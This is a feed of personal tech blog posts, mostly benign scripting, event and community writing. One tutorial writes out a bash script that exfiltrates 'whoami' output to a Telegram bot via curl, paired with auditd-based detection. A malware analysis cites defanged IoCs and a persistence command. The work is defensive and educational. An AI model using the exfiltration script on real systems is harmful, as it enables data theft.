Forem: Paula

Bye bye!

Paula — Thu, 03 Jul 2025 16:18:53 +0000

Hello!

I'm well aware this post might become an issue, so first of all I want to say thank you to all of you who have enjoyed my posts until now and commented and supported them. I'm truly grateful for that!

It's been a while since I wrote and that's partly because I didn't felt like it. In my account I hold 18 badges, 8 from year commemorations and the rest from commit contribution (so I could add my mastodon account and so anyone could, it worked for a while and happy about that), "nevertheless she coded", writing strikes and more. I feel like a girl scout (jk, I love my badges)

I even helped with moderation for a while on my free time, just for the sake of this community because I really liked it and its people.

I started writing mostly to share my development in tech and security, I learned a lot from communities so I wanted to give something back. That, I keep doing in other places, too. I think we all need to share our knowledge to be better together. It might sound naive, and I'm well aware: it is not. Not everything needs to be a potential efficient product, and not everything, to be valuable and useful, needs to enroll a tech trend. I learned that mostly working with tech in the margins in my free time: limited resources for a local hackerspace, limited resources for schools, in a social radio station, tech for minorities, organizing free software events and more. Technology for communities works better in the long run (and for better purposes) when it's also community driven and multidisciplinary. Maybe slower? Maybe it takes more time? Sure, probably. Still, better.

I recently heard Cloudflare CEO speaking (LINK, be aware this is an X/twitter link) about how AI bots and content is messing up with content creators, those who wrote the actual information in the first place. He spoke from the visibility of his platform, but this is something many content creators (specially those who wrote or drew) were already saying. I've been visiting this place and recently wondered how many are truly people sharing and how many are automated SEO for visibility. Made me feel bitter about it.

I'm also motivated by the climate impact of generative AI, which is apparently the favorite topic lately. It's no secret, it's already been said, researched and all. Some of us are even seeing our countries being the target for massive Data Centers (not regular ones) despite the fact of being heavily impacted by the climate change (water availability issues, extreme hot, etc). I will leave the numbers to associations such as Tu Nube Seca mi Rio, but you get the idea right?

I got upset when I saw another community holding hands with trending-driven AI deals. It's not my call, and me leaving has no impact, it might even backfire.

I really want to spend my time in digital spaces that will make me feel I'm doing my best, the best I can. I really don't want to put a single feather more on to the weight of the climate and technology mess that my daughter is going to inherit.

I'm not nostalgic, I didn't have time to be (I'm only 29 hehe). I'm not naive, either, I've given my tech career time, and sacrifice in and out the working context. I've faced and fought misogyny in several digital and tech spaces so others didn't have to. Let me tell you, I've worked on my relationship with technology from several angles.

I just believe tech communities can do better and I want to work towards that, as I've always done. Some years ago it was by working alongside the local Free Software Office, and now, 8 years later, I'm just advocating for the tech I believe in.

As I've always done.

I try to remember individual actions will only get you so far. I feel this decision is more of a collaboration to those communities who want to work towards permacomputing.

Thanks for all this years of fun interactions and content sharing. I hope this letter is more of a warm goodbye rather than a bitter message. I'm proud of the DEVTO stickers I have in my laptop and I'm happy I've been around.

Have a great day, reader (unless you are a bot hehe)
Hugs

Preparing for esLibre

Paula — Thu, 11 Apr 2024 15:48:45 +0000

Next month, the 6th edition of esLibre congress will occupy Las Naves, in Valencia (Spain), the May 24th and 25th. The event started in Granada, as the former local Free Software Office responsible and university teacher, JJ, pushed the idea into some of the people who were used to organize similar things (including myself). Since then, we've slowly created some traditions, such as celebrating the event in a different city each time, so communities and individuals all around Spain had the opportunity to assist at some point. This added a brand new layer of complexity, that included finding local communities aiming to help us, or understanding the context of each new emplacement to adapt the event to it.

Each year, the organization, as well as the event itself, is different. Yet, we try to keep some common ground: free culture, diversity awareness and recognition to both technical and non-technical skills that keep the free software culture rolling. We had our issues through the peak of the pandemic years, but we are trying to, slowly (and safe) coming back to what it used to be. This year we are humbled to also share our event with KDE España and their Akademy congress, as well as a room for Wikimedia and a DEVROOM for academical free software discussions, among all the talks, workshops and short talks.

As we are escalating, we decided to reserve a short space for a round table on "Organizing a free software event" which is meant for others to have a guide based on how we do it, answering questions and more. I will try to share the key points over here afterwards.

After receiving a great amount of proposals (even more than the last years) we are trying to put it all together and soon we will publish the final schedule. In the meantime, you all can see the proposals themselves, as they are automated to go from the form to a pull request in our repo to assure transparency in the voting and commenting period.

Every year I feel astonished by the amount of people willing to either help, participate or assist, just to talk and discuss free software and their communities. I recently read a really sad header somewhere saying "are free software communities dying?" let me tell you: they are not, since I see it. Even when things seem rough in the tech world, there's someone out there willing to create code for others, just because. Or translating documentation, so it's more accessible. Or thinking of ways the software could look better, more intuitive. I know a lot of people came around to the idea this exist and that's it. I pretty much myself became an actual adult through university having my hand hold by this sort of communities, and ten years later I keep feeling surrounded by it. I should be the one more used to this, but I'm not, I keep feeling grateful and surprised.

Here, look for us in:

Telegram: https://t.me/esLibre
Mastodon: https://floss.social/@eslibre/
Gitlab: https://gitlab.com/eslibre
Twitter: https://twitter.com/esLibre_

Linux Exfiltration

Paula — Wed, 20 Mar 2024 17:13:33 +0000

One of the most prominent threats right now is Infostealers. These would be a kind of malware that captures information from devices and sends the stolen data to an attacker. While this technique is integrated in other attacks (f.e. ransomware) it could work on its own, for selling, cyber espionage and more.

In the past months, one of the most popular exfiltration attempts was done through Telegram or Discord bots (as well as C2-Command and Control attempts).

I've been asked a few times how this is done, so in this article, I'm creating a very simple example of how Telegram could be used to exfiltrate and how to detect that attempt. Let's go!

Telegram bot

In order to do this, a Telegram Bot and a Channel are required. You need to create a bot with the help of BotFather and then create a Channel and add the bot to it. Send a message to the Channel and then use the following to get the Channel info:

https://api.telegram.org/bot<BotToken>/getUpdates

As described here, this will allow you to get the Channel ID. Once you know the channel ID, you can send a message using:

curl 'https://api.telegram.org/bot<BotToken>/sendMessage?chat_id=<channelId>&text=<my message>'

Understanding this, we could create a script that enumerates the system information and sends a message describing it. Let's create a really simple example that just sends the whoami output for the sake of the example. Of course, this could include way more things such as architecture, disk info and more. Most of there sort of samples will attempt to also check crypto wallet info.

Anyway, let's say we have the following script:

#!/bin/bash

messa=$(whoami)
mycommand="https://api.telegram.org/bot<BotToken>/sendMessage?chat_id=<channelId>&text=$messa"

curl $mycommand

When this is executed, the username is sent to the channel.

Now, most of these will install the script in cron usign crontab and delete the history log.

In case the crontab log is still intact, we will be able to see the crontab edition using cat /var/log/syslog | grep -w 'crontab'. But let's explore a cool option: auditd

Now, installing auditd is fairly simple. And while you can create your own rules, you can also use a default configuration and you are good to go!

Now, if we use sudo cat /var/log/audit/audit.log | grep telegram | grep api we would be able to see the attempt of our script!

Sometimes these attacks include messing up the /var/log so maybe having a backup in a different path could be useful, too.

Anyway, this was a simple, friendly introduction. Expect more complex attacks! (and simpler, too :) )

If you are curious about analyzing real life samples, take a look at my older posts about setting a custom Linux Honeypot. Most of the things I capture are miners, which could use some common characteristics with info-stealers (messing up with cron for persistence, attempting enumeration, attempting Dynamic Linker Hijacking attack, and more).

Creating a Linux Terminal Pokedex

Paula — Tue, 09 Jan 2024 16:41:48 +0000

I recently found an API for Pokemon and I wrote a simple Pokedex for fun using the data available.

The api is pretty straightforward, you give it the ID or name of a Pokemon, it give you back information in a json file. I used bash and jq to parse the information.

curl -s https://pokeapi.co/api/v2/pokemon/<my pokemon>

So, imagine we want to get the type of the Pokemon. Taking a quick look at the json, I check were the type is and then write:

strings $mipoke.json | jq -r '.types[].type.name'

While $mypoke is the Pokemon name. SOme of them have two types so I save them in variables and check the existence of the second one:

first_type=$(strings $mipoke.json | jq -r '.types[0].type.name')
second_type=$(strings $mipoke.json | jq -r '.types[1].type.name')


if  [ -z "$second_type" ]; then
      echo -e "$second_type"
fi

I though it would be fun to set colors according to the type, so created a palette in the header:

export COLOR_NC='\e[0m' # No Color

export COLOR_BLACK='\e[0;30m'
export COLOR_GRAY='\e[1;30m'
export COLOR_RED='\e[0;31m'
export COLOR_LIGHT_RED='\e[1;31m'
export COLOR_GREEN='\e[0;32m'
export COLOR_LIGHT_GREEN='\e[1;32m'
export COLOR_BROWN='\e[0;33m'
export COLOR_YELLOW='\e[1;33m'
export COLOR_BLUE='\e[0;34m'
export COLOR_LIGHT_BLUE='\e[1;34m'
export COLOR_PURPLE='\e[0;35m'
export COLOR_LIGHT_PURPLE='\e[1;35m'
export COLOR_CYAN='\e[0;36m'
export COLOR_LIGHT_CYAN='\e[1;36m'
export COLOR_LIGHT_GRAY='\e[0;37m'
export COLOR_WHITE='\e[1;37m'

And then I created a basic conditional to set the color for the types:

# initializing color variables
color1="${COLOR_WHITE}"
color2="${COLOR_WHITE}"
...
#creating a function so I don't 
#commit redundancy in both types
check_colors() {
tipo=$1
color="${COLOR_WHITE}"

if [[ "$tipo" = "fairy" || "$tipo" = "psychic" ]]; then
        color="${COLOR_LIGHT_PURPLE}"
elif [[ "$tipo" = "steel" || "$tipo" = "normal" ]]; then
        color="${COLOR_LIGHT_GRAY}"
elif [[ "$tipo" = "grass" || "$tipo" = "bug" ]]; then
        color="${COLOR_GREEN}"      
elif [[ "$tipo" = "water" || "$tipo" = "ice" ]]; then
        color="${COLOR_BLUE}"
elif [ "$tipo" = "poison" ]; then                           
        color="${COLOR_PURPLE}"
elif [ "$tipo" = "electric" ]; then
        color="${COLOR_YELLOW}"

fi

echo "$color"
}
...
#setting the color for the first type
color1="$(check_colors $first_type)"

#if second type exists, setting the color, too
if  [ -z "$second_type" ]; then
      color2="$(check_colors $second_type)"
      echo -e "$color2 $second_type ${COLOR_NC}"
fi

Now the next two interesting things might be moves and abilities.I realized in a quick test that moves are too many, so I opted for showing a small sample and saving all the rest in a different file:

strings $mipoke.json | jq -r '.moves[].move.name' | head -n5
echo "...\nCheck the whole list in the file $mipoke.moves"
strings $mipoke.json | jq -r '.moves[].move.name' >> $mipoke.moves

Abilities aren't usually too many, so I kept them simple:

strings $mipoke.json | jq -r '.abilities[].ability.name'

I decided I wanted to do a charming detail so I captured the weight:

weight=$(strings $mipoke.json | jq -r '.weight')

Converted it to kg (it's in lbs):

inkg=$(bc <<< "scale=2; $weight*0.45")

And then use it in a conditional so to give advice on how to handle the Pokemon:

inkg_int=$(bc <<< "$inkg/1")
inkg_int=$(($inkg_int))

if [[ "$inkg_int" -lt 35 && "$inkg_int" -gt 10 ]]; then
        consejo="That means you can carry it for a while, but you can hurt you back! let them walk"
elif [[ "$inkg_int" -lt 11  && "$inkg_int" -gt 5 ]]; then
        consejo="That means is your pokemon is quite light and you might be able to carry it around a lot."
elif [ "$inkg_int" -lt 6 ]; then
        consejo="That means your pokemon is very light, tiny cute baby, and you might even be able to carry it around in a bag, if it pleases them."
elif [[ "$inkg_int" -lt 60  && "$inkg_int" -gt 34 ]]; then
        consejo="Your pokemon weights like a human teen or an adult even, so try to look for ways of taking care of them without carrying it to much unless you want to hurt your back!"
elif [[ "$inkg_int" -lt 200  && "$inkg_int" -gt 59 ]]; then
        consejo="Your pokemon might be a little bit too heavy for carrying it, so don't attempt to do it. Nevertheless look for alternatives such as patting and saying nice words."
else
        consejo="Your pokemon is a thicc baby, they won't expect you to carry it. But they will probably like pats and nice words."
fi

echo "$consejo"

It was pretty much done. I added some visual details (further colors, sparkles) and the possibility of tooting in your mastodon the final information. For that I duplicated every print into a file and then:

read -p"Do you want to toot it? y/n: " ANS

if [[ "$ANS" = "y" || "$ANS" = "Y" ]]; then
        toot post "$(strings mytoot)"
else
        echo "okay, not tooting!"
fi

And that's it!

Here's the repo.

Analyzing a Linux malware binary

Paula — Tue, 19 Dec 2023 14:16:10 +0000

I encountered an interesting file in my honeypot a couple of days ago and it's not on virustotal or similar so I decided to take advantage of the situation a take a closer look myself.

Before going further let me tell you I'm not whatsoever a reversing expert, just a messy curious threat intel/threat hunting expert, and this article was a for-fun activity. I do like it and I wish I could properly do reversing! Someday, maybe.

The attacker uploaded the file through sftp:

Before anything else I used radare2 so to get some general info about the file:

rabin2 -I mymalware

And found out the following things:

arch     x86
baddr    0x400000
binsz    30048232
bintype  elf
bits     64
canary   false
injprot  false
class    ELF64
crypto   false
endian   little
havecode true
intrp    /lib64/ld-linux-x86-64.so.2
laddr    0x0
lang     c
linenum  false
lsyms    false
machine  AMD x86-64 architecture
nx       true
os       linux
pic      false
relocs   false
relro    partial
rpath    NONE
sanitize false
static   true
stripped true
subsys   linux
va       true

And:

rabin2 -Ir mymalware

e cfg.bigendian=false
e asm.bits=64
e asm.dwarf=true
e asm.codealign=1
e bin.lang=c
e file.type=elf
e asm.os=linux
e asm.arch=x86

So it's pretty clear that we are taking a look at a linux binary. Why is it interesting? What I usually find in my honeypot are IRC based miners, scripts for initial deployment and some keys, but this is slightly different.

I took a very quick look at the strings, and realized it used Golang. The file itself is stripped, as I realized when using >afl | head -n20 (just 20 lines so to take a look) even when using a pipe with redress.

This didn't stop me. I took a quick look around. I used binwalk and `strings. I proceeded to note down some general clear ideas:

It uses Golang
It's an elf for AMD x86-64 architecture

Anyway I tried to look for executable paths and exfiltration traces or maybe C2, since those are the common things found in bots or maybe stealers. I have a bunch of key-words that help me dive through these sort of things, and I found a suspicious hardcoded IP in /etc/services:

100.64.0[.]0
Using a really quick search over VT, it revealed a pulse related with GoScanSSH family, which pretty much fits in this situation.

I keep searching:

Realized that it also tries to identify the IP using some legit IP info services online, such as

http://ipgrab[.]io https://ident[.]me https://ip.seeip[.]org http://inet-ip[.]info

And saves it all into a zip file. I wondered where did it meant to send it and I found a hardcoded discord api location, so that must be it, since discord (as well as Telegram) is currently being used a lot for exfiltration.

Then I found some command lines (for example chmod attempts, but not for example chattr or ulimit, which usually goes together in regular miner families) that grabbed my attention:

service systemd-worker enable || systemctl enable systemd-worker.service

Basically because that "systemd-worker" thing sounded familiar. I remember reading about this before so a quick search and yep! It reminded my of Panchan.

"(...)Finally, the malware executes the binary and initiates an HTTPS POST operation to a Discord webhook, which is likely used for monitoring the victim.

To establish persistence, the malware copies itself to `/bin/systemd-worker and creates a new systemd service to launch after reboot while masquerading as a legitimate system service.(..)"

it adds up.

This definitely rang a bell and looked for some more info about it and I found some "look and destroy"-like (as I like to call it) function:

current_preset_xmrig_enabled *bool; current_preset_xmrig_nicehash

Yeah this totally looked like Panchan. And, according to Bleeping Computer:

"The malware also features an anti-kill system that detects process termination signals and ignores them unless it's SIGKILL which isn't handled."

I also saw this before going around, so I rechecked:

SIGKILL: kill
SIGQUIT: quit

And... yeah after reading the article that akamai I saw this:

If you are wondering: yes, I checked previously with an automated genetic analysis and static analysis vendors, but it wasn't very helpful and didn't point me to the actual threat (mostly because it was corrupted, but that doesn't mean it doesn't have information in it!).

Anyway this has been fun. I totally have to sharpen my reversing abilities so to make this "the proper way" and not "string | grep" it.

You can check the IoCs in my AlienVault pulse!
If you want to read the japanese version, check here
日本語の記事はここにです

The broken spaceship Honeypot updates

Paula — Fri, 15 Dec 2023 10:39:26 +0000

As I already mentioned in previous posts, I've been working towards custom cowrie honeypots to gather information related with Linux threats.

I recently updated it, and updated the readme description with the step by step guide in the repo and the gemini blog, so so include some fixers for common issues I found this year when resetting the whole thing (such as python misconfiguration, docker permissions, files permissions and more) adding and extra drop of information related to cowrie, which already has a good documentation and a few articles out there. I hope my issues and the way I took care of them serves as a time-saver for other people interested in setting their own thing.

Friendly reminder I share the IoCs and thoughts related to this project from time to time in The broken spaceship.

CALL me, maybe

Paula — Mon, 30 Oct 2023 13:15:12 +0000

When I was studying computer engineering at university I was a huge assembly nerd, and fueled my love for low level stuff. Years after, I haven't really used assembly, so I forgot almost all about it and I decided to give it a go so to remember a little bit about it, so I decided to re-do (by memory and with the help of the Internet) one of the activities I did back then: benchmarking assembly against another language doing the very same thing. Back then I did a Hello world thing, but since I know better now, I decided to have a bit more fun and I created a comparison script. The script is simple: it ask you to write something, if that something is "hello" it greets you back.

Let's take a look at such a script in bash, my fav scripting language:

#!/bin/bash
read -p"Enter command: " ANS
if [ "$ANS" == "hola" ]; then
    echo "hola, que tal"
else
    echo "ERROR"

Easy peasy. Now let's do the same thing in NASM assembly:

asm 
section .data
   msg1:      db   'Hola, que tal',10 ; msg1
   lenmsg1:   equ   $-msg1 ; length msg1
   msg2:      db   'ERROR',10 ; msg2
   lenmsg2:   equ   $-msg2 ; length msg2
   str2:      db   'hola' ; str2
   lenstr2:   equ   $-str2 ; length str2
   userMsg db 'Please enter order: ' ;Ask the user to enter a number
   lenUserMsg equ $-userMsg             ;The length of the message
   dispMsg db 'The computer says: '
   lenDispMsg equ $-dispMsg  
section .bss
   reply resb 5
section .text
   global _start
_start:
   mov eax, 4
   mov ebx, 1
   mov ecx, userMsg
   mov edx, lenUserMsg
   int 80h
   ;Read and store the user input
   mov eax, 3
   mov ebx, 2
   mov ecx, reply  
   mov edx, 5          ;5 bytes (numeric, 1 for sign) of that information
   int 80h
   ;Output the message 'The entered number is: '
   mov eax, 4
   mov ebx, 1
   mov ecx, dispMsg
   mov edx, lenDispMsg
   int 80h 
   mov esi,reply
   mov edi,str2
   mov ecx,lenstr2+1
   cld
   repe cmpsb
   jecxz good
   ; If bad
   mov eax,4
   mov ebx,1
   mov ecx,msg2
   mov edx,lenmsg2
   int 80h
   jmp exit
good:
   mov eax,4
   mov ebx,1
   mov ecx,msg1
   mov edx,lenmsg1
   int 80h
exit:
   mov eax,1
   mov ebx,0
   int 80h

Now, let's compile the NASM:

$ nasm -f elf hellothere.asm
$ ld -m elf_i386 -s -o hellothere hellothere.o

Nice! Let's execute both and see how it works:

BASH:

./hellothere.sh
Enter command: hola
hola, que tal

Now, assembly:

./hellothereas
Please enter order: hola
The computer says: hola, que tal

Looks good to me. Now the fun part! We are using strace to measure the basics of both scripts, wanna learn more? This stack overflow thread is pretty nice. Now, let's get to it:

strace -o trace_bash -c -Ttt ./hellothere.sh 
strace: -t/--absolute-timestamps has no effect with -c/--summary-only
strace: -T/--syscall-times has no effect with -c/--summary-only
Enter command: hola
hola, que tal

strace -o trace_assembly -c -Ttt ./hellothereas
strace: -t/--absolute-timestamps has no effect with -c/--summary-only
strace: -T/--syscall-times has no effect with -c/--summary-only
Please enter order: hola
The computer says: Hola, que tal

The benchmarking is inside the trace_assembly and trace_bash files, let's take a look:

ASSEMBLY:

% time     seconds  usecs/call     calls    errors syscall
------ ----------- ----------- --------- --------- ----------------
100.00    0.000476         476         1           execve
------ ----------- ----------- --------- --------- ----------------
100.00    0.000476         476         1           total
System call usage summary for 32 bit mode:
% time     seconds  usecs/call     calls    errors syscall
------ ----------- ----------- --------- --------- ----------------
 51.92    0.000027          27         1           read
 48.08    0.000025           8         3           write
------ ----------- ----------- --------- --------- ----------------
100.00    0.000052          13         4           total

BASH:

% time     seconds  usecs/call     calls    errors syscall
------ ----------- ----------- --------- --------- ----------------
  0.00    0.000000           0         6           read
  0.00    0.000000           0         2           write
  0.00    0.000000           0         7           close
  0.00    0.000000           0         3           lseek
  0.00    0.000000           0        14           mmap
  0.00    0.000000           0         4           mprotect
  0.00    0.000000           0         1           munmap
  0.00    0.000000           0         3           brk
  0.00    0.000000           0        14           rt_sigaction
  0.00    0.000000           0         5           rt_sigprocmask
  0.00    0.000000           0         4         2 ioctl
  0.00    0.000000           0         4           pread64
  0.00    0.000000           0         1         1 access
  0.00    0.000000           0         1           dup2
  0.00    0.000000           0         3           getpid
  0.00    0.000000           0         1           execve
  0.00    0.000000           0         1           uname
  0.00    0.000000           0         3         1 fcntl
  0.00    0.000000           0         1           sysinfo
  0.00    0.000000           0         1           getuid
  0.00    0.000000           0         1           getgid
  0.00    0.000000           0         1           geteuid
  0.00    0.000000           0         1           getegid
  0.00    0.000000           0         3           getppid
  0.00    0.000000           0         1           getpgrp
  0.00    0.000000           0         2         1 arch_prctl
  0.00    0.000000           0         1           futex
  0.00    0.000000           0         1           set_tid_address
  0.00    0.000000           0         7           openat
  0.00    0.000000           0        18           newfstatat
  0.00    0.000000           0         1           set_robust_list
  0.00    0.000000           0         3           prlimit64
  0.00    0.000000           0         1           getrandom
  0.00    0.000000           0         1           rseq
------ ----------- ----------- --------- --------- ----------------
100.00    0.000000           0       121         5 total

I know what are you thinking. "You didn't compile the bash!"

Okay then let's try that, shall we:

shc -f hellothere.sh
mv hellothere.sh.x hellothere_bash

And bechmarking!

strace -o trace_bash_ex -c -Ttt ./hellothere_bash

Let's take a look!

% time     seconds  usecs/call     calls    errors syscall
------ ----------- ----------- --------- --------- ----------------
 37.69    0.000652         163         4           execve
 15.84    0.000274           6        44           mmap
  7.86    0.000136           3        35           newfstatat
  5.49    0.000095           5        16           openat
  4.34    0.000075           2        31           rt_sigaction
  3.87    0.000067           4        14           mprotect
  3.12    0.000054           7         7           read
  2.83    0.000049           3        16           close
  2.49    0.000043          10         4           munmap
  1.85    0.000032           2        16           pread64
  1.79    0.000031           3        10           rt_sigprocmask
  1.73    0.000030          15         2           write
  1.62    0.000028           2        12           brk
  0.98    0.000017           2         8           getpid
  0.92    0.000016           2         6           getppid
  0.81    0.000014           2         5         2 ioctl
  0.81    0.000014           3         4         4 access
  0.75    0.000013           1         8         4 arch_prctl
  0.58    0.000010           5         2           sysinfo
  0.58    0.000010           1         6           prlimit64
  0.52    0.000009           2         4           getrandom
  0.46    0.000008           2         4           rseq
  0.40    0.000007           3         2           futex
  0.40    0.000007           1         4           set_tid_address
  0.40    0.000007           1         4           set_robust_list
  0.29    0.000005           2         2         2 getpeername
  0.29    0.000005           2         2           uname
  0.29    0.000005           2         2           getuid
  0.29    0.000005           2         2           getpgrp
  0.23    0.000004           2         2           getgid
  0.23    0.000004           2         2           geteuid
  0.23    0.000004           2         2           getegid
------ ----------- ----------- --------- --------- ----------------
100.00    0.001730           6       282        12 total

Wow! You know what? you can actually compile stuff using something called "Optimization" which is pretty much assembly magic, or the non-lazy way, which takes a little bit more compiling processing but the result is optimized. Did you know?

Let me show you using a C version of this command:

#include<stdio.h>
#include<string.h>

char *mygets(char *buf, size_t size) {
    if (buf != NULL && size > 0) {
        if (fgets(buf, size, stdin)) {
            buf[strcspn(buf, "\n")] = '\0';
            return buf;
        }
        *buf = '\0';  /* clear buffer at end of file */
    }
    return NULL;
}

int string_compare(char str1[], char str2[])
{
    int ctr=0;

    while(str1[ctr]==str2[ctr])
    {
        if(str1[ctr]=='\0'||str2[ctr]=='\0')
            break;
        ctr++;
    }
    if(str1[ctr]=='\0' && str2[ctr]=='\0')
        return 0;
    else
        return -1;
}


int main()
{
    char a[100];
    char b[] = "hola";
    printf("Enter command\n");    
    mygets(a, sizeof a);    

    if( string_compare(a,b) == 0 )
        printf("hola que tal\n");
    else
        printf("ERROR.\n");
        return 0;
}

Before going forward, some clarifications:

I used a "mygets" function so to substitute "gets" function, the reason is over here.
I used a function for comparing instead of strcmp (inspired by this one) so to be in control and make it as low level as possible.

Let's compile it!

gcc -o hello_in_c hello.c

Now benchmarking:

trace -o trace_forc -c -Ttt ./hello_in_c

And this is the result with default optimization:

% time     seconds  usecs/call     calls    errors syscall
------ ----------- ----------- --------- --------- ----------------
  0.00    0.000000           0         2           read
  0.00    0.000000           0         2           write
  0.00    0.000000           0         2           close
  0.00    0.000000           0         8           mmap
  0.00    0.000000           0         3           mprotect
  0.00    0.000000           0         1           munmap
  0.00    0.000000           0         3           brk
  0.00    0.000000           0         4           pread64
  0.00    0.000000           0         1         1 access
  0.00    0.000000           0         1           execve
  0.00    0.000000           0         2         1 arch_prctl
  0.00    0.000000           0         1           set_tid_address
  0.00    0.000000           0         2           openat
  0.00    0.000000           0         4           newfstatat
  0.00    0.000000           0         1           set_robust_list
  0.00    0.000000           0         1           prlimit64
  0.00    0.000000           0         1           getrandom
  0.00    0.000000           0         1           rseq
------ ----------- ----------- --------- --------- ----------------
100.00    0.000000           0        40         2 total

Optimizations -O2,-O3and -Ofast give me the same strace results.

Let's check maybe in python? this is the last language I promise!

import re

def compare_strings(string1, string2):
    pattern = re.compile(string2)
    match = re.search(pattern, string1)

    if match:
        print(f"hola, que tal")
    else:
        print(f"ERROR")

string1 = "hola"
string2 = input("Enter command:")


compare_strings(string1, string2)

First let's strace the script itself:

$ strace -o trace_python1 -c -Ttt python3 hello.py
$ strings trace_python1

% time     seconds  usecs/call     calls    errors syscall
------ ----------- ----------- --------- --------- ----------------
 31.95    0.001331           4       328        58 newfstatat
 22.28    0.000928          42        22           getdents64
 10.95    0.000456           4        97           read
 10.35    0.000431           6        66         3 openat
  5.74    0.000239           3        66           close
  5.52    0.000230           2        91         3 lseek
  4.30    0.000179           2        63        52 ioctl
  3.84    0.000160           2        66           rt_sigaction
  3.02    0.000126          10        12           brk
  0.96    0.000040           1        28           mmap
  0.41    0.000017           4         4         3 readlink
  0.17    0.000007           2         3           dup
  0.17    0.000007           7         1           sysinfo
  0.10    0.000004           2         2           getcwd
  0.07    0.000003           3         1           getuid
  0.05    0.000002           2         1           fcntl
  0.05    0.000002           2         1           getgid
  0.05    0.000002           2         1           geteuid
  0.05    0.000002           2         1           getegid
  0.00    0.000000           0         2           write
  0.00    0.000000           0         8           mprotect
  0.00    0.000000           0         2           munmap
  0.00    0.000000           0         4           pread64
  0.00    0.000000           0         1         1 access
  0.00    0.000000           0         1           execve
  0.00    0.000000           0         2         1 arch_prctl
  0.00    0.000000           0         1           futex
  0.00    0.000000           0         1           set_tid_address
  0.00    0.000000           0         1           set_robust_list
  0.00    0.000000           0         1           prlimit64
  0.00    0.000000           0         2           getrandom
  0.00    0.000000           0         1           rseq
------ ----------- ----------- --------- --------- ----------------
100.00    0.004166           4       881       121 total

Now let's compile it! For python, the most popular compiling tool is pyinstaller

$ pyinstaller hello.py
$ cd /dist/hello
$ strace -o trace_python2 -c -Ttt ./hello
$ ls trace_python2

% time     seconds  usecs/call     calls    errors syscall
------ ----------- ----------- --------- --------- ----------------
 29.59    0.000377           1       209           read
 22.61    0.000288           2       122        15 openat
 12.24    0.000156           0       176         3 lseek
 10.83    0.000138           0       162        15 newfstatat
  8.79    0.000112           1       110           close
  8.16    0.000104           4        21           brk
  6.59    0.000084           0        86        76 ioctl
  0.71    0.000009           0        69           mmap
  0.47    0.000006           1         4           getcwd
  0.00    0.000000           0         2           write
  0.00    0.000000           0         2           lstat
  0.00    0.000000           0        20           mprotect
  0.00    0.000000           0         6           munmap
  0.00    0.000000           0        66           rt_sigaction
  0.00    0.000000           0         8           pread64
  0.00    0.000000           0         2         2 access
  0.00    0.000000           0         3           dup
  0.00    0.000000           0         2           execve
  0.00    0.000000           0         1           fcntl
  0.00    0.000000           0         3         1 readlink
  0.00    0.000000           0         1           sysinfo
  0.00    0.000000           0         4         2 arch_prctl
  0.00    0.000000           0         1           futex
  0.00    0.000000           0         4           getdents64
  0.00    0.000000           0         2           set_tid_address
  0.00    0.000000           0         2           set_robust_list
  0.00    0.000000           0         2           prlimit64
  0.00    0.000000           0         3           getrandom
  0.00    0.000000           0         2           rseq
------ ----------- ----------- --------- --------- ----------------
100.00    0.001274           1      1095       114 total

Now, what conclusions can we briefly extract from these test?

Well, if we are using some high-level programming we have to trust in the compilation, if we are using low level (like assembly) you are in control but, as a human, you might not be able to make it more optimized as a good compiler, or in general how the low level details for our compiling choices work.

You might be asking yourself, does this really matter? In a world where even the smallest processing units are capable of running heavy stuff? In a situation in which we are at the peak of the Moore's law?

There are several answers to this. As it's amazingly put in this article There's an inherent responsibility in caring about even the smallest things as technologist (a word that I like waaay more than engineer, since tech and low-tech is made by several sort of people). They hurry-up ways we've been procuring for years as a society is leveraging the climate issues, so it does make sense to think about this. Don't get me wrong here, I'm not telling you "stop using random compilers and languages!" (also I use python a lot! as well as other languages), what I'm saying is that it might be interesting to take into consideration what we are doing and what are we using to make our tech possible. Maybe explore different options and step over new ideas in different directions.

There's something about exploring and trying new tech things that makes people excited, and there are certain tech-developers who takes advantage of this wonderful feeling so to create more hurtful tech (for people and for the environment). What I'm saying is take that excitement and use it to explore new ideas, or old ideas from new perspectives so to make everything better! There are so many communities that are in need of these sort of explorations.

So, the easy answer it, no, it doesn't really matter in terms of a single or a bunch of binaries calling stuff in a perfectly functional computer. All of the binaries and scripts above worked perfectly and, as an human, I didn't notice anything different among them in the performance. There were some tiny little differences though! which makes me think "how many other things are happening out there with my daily programs that I'm not noticing?" It's not really about efficiency here. It's about understanding a little bit more about what we are doing and how it works.

Linux security LAB Broken Spaceship

Paula — Tue, 24 Oct 2023 08:37:20 +0000

I've been slowly working in my free time in this Linux security sharing platform with a cute mascot and some educational purposes in mind, called Broken Spaceship.

It's a research lab meant to share interesting security facts that find, as well as the IoC (indicators of compromise) from my honeypot. It's run by a free software spirit, so the repo is there for everyone to take a look. I intend to improve it, but the whole thing is kind of set up.

I intend to create a MISP in the future (an alfa version was already tested by some close, technical friends) but for now, apart from the website, the indicators are shared in:

OTX Alien Vault
Telegram
LINE (Japanese)
Misskey (Japanese)

I don't spam! just slowly sharing my passion :)

I'm spending more time and focus on the Japanese version of the platform, but nevertheless the information is available in English, too.

Creating a simple wind forecast bot in Mastodon

Paula — Fri, 06 Oct 2023 12:28:03 +0000

I'm keeping a manual log (manual like in pencil and paper) of weather forecast in the mountain I like the most (Sierra Nevada). At some point I got interested in building scripts to help me out and I started sharing that information in Mastodon using a bot.

First of all, a note on Mastodon bots. They are easy to set up! specially using toot command. I created an account, added the specification that says it's a bot, configured the authorization in toot and got it running. Once I got there I created a simple weather parser so to be able to toot automatically the weather forecast in Mastodon.

Then I started to learn about wind and I got interested in getting wind details easily so to note them down. I asked around my community and I got an answer: open-meteo.

While it has it's limitations it worked perfectly for my purpose, a script to help me gather wind details through the day.

First of all I used the interactive API to get the info that I wanted (Sierra Nevada, one day, wind details) into a CSV:

curl "https://api.open-meteo.com/v1/forecast?latitude=37.095&longitude=-3.3969&hourly=temperature_2m,windspeed_180m&forecast_days=1&format=csv" > mywindtoday.csv

Then I counted the total lines of the file:

lines=$(wc -l mywindtoday.csv | cut -d ' ' -f1|tr '\n' ' '

Also I created a variable for the half of the values line, discarding the first description lines (which are 5):

mdline=$((($lines/2)+5))

Between the noon (first line, 00:00) and the half of the file is morning, so I created a variable for morning:

mnline=$(( ($mdline/2)+5 ))

And between the half and the end it's evening, so I created another variable for that:

eveline=$(( (($lines-$mdline)/2) + $mdline ))

The first noon values That I want are hour and wind, so I parse the CSV looking for those values in the key daytimes I estimated before:

midnight=$(csvcut -c 1,3 mywindtoday.csv | sed '5!d')
